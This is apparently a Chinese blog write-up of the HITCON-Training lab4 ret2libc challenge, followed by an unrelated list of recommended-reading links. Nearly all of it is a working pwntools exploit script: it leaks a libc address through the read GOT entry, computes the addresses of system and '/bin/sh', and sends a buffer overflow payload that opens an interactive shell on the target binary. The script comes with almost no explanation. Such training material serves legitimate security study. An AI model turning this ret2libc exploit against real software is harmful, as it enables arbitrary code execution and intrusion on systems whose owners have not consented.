HITCON-Training-master|HITCON-Training-master lab4 wp
【HITCON-Training-master|HITCON-Training-master lab4 wp】简单的ret2libc,话不多说,直接上脚本
exp:
from pwn import*
context.log_level = "debug"
p = process('./ret2lib')
lib = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./ret2lib')puts_plt = elf.symbols['puts']
read_got = elf.got['read']
read_plt = elf.plt['read']
main = elf.symbols['main']binsh_lib = next(lib.search("/bin/sh"))
system_lib = lib.symbols['system']
read_lib = lib.symbols['read']log.info("****************leak address****************")
p.recv()
p.sendline(str(read_got))
p.recvuntil("0x")
read_add = int(p.recv(8),16)libc_base = read_add - read_lib
print "libc_base --> [%s]"%hex(libc_base)
system_add = libc_base + system_lib
print "system address -->[%s]"%hex(system_add)
binsh_add = libc_base + lib.search('/bin/sh').next()
print "binsh_add --> [%s]"%hex(binsh_add)log.info("**************ret2libc*********************")
payload = 'a'*0x38 + 'bbbb' + p32(system_add) + p32(0xdeadbeef) + p32(binsh_add)
p.recv()
p.sendline(payload)
p.interactive()
推荐阅读
- 宽容谁
- 我要做大厨
- 增长黑客的海盗法则
- 画画吗()
- 2019-02-13——今天谈梦想()
- 远去的风筝
- 三十年后的广场舞大爷
- 叙述作文
- 20190302|20190302 复盘翻盘
- 学无止境,人生还很长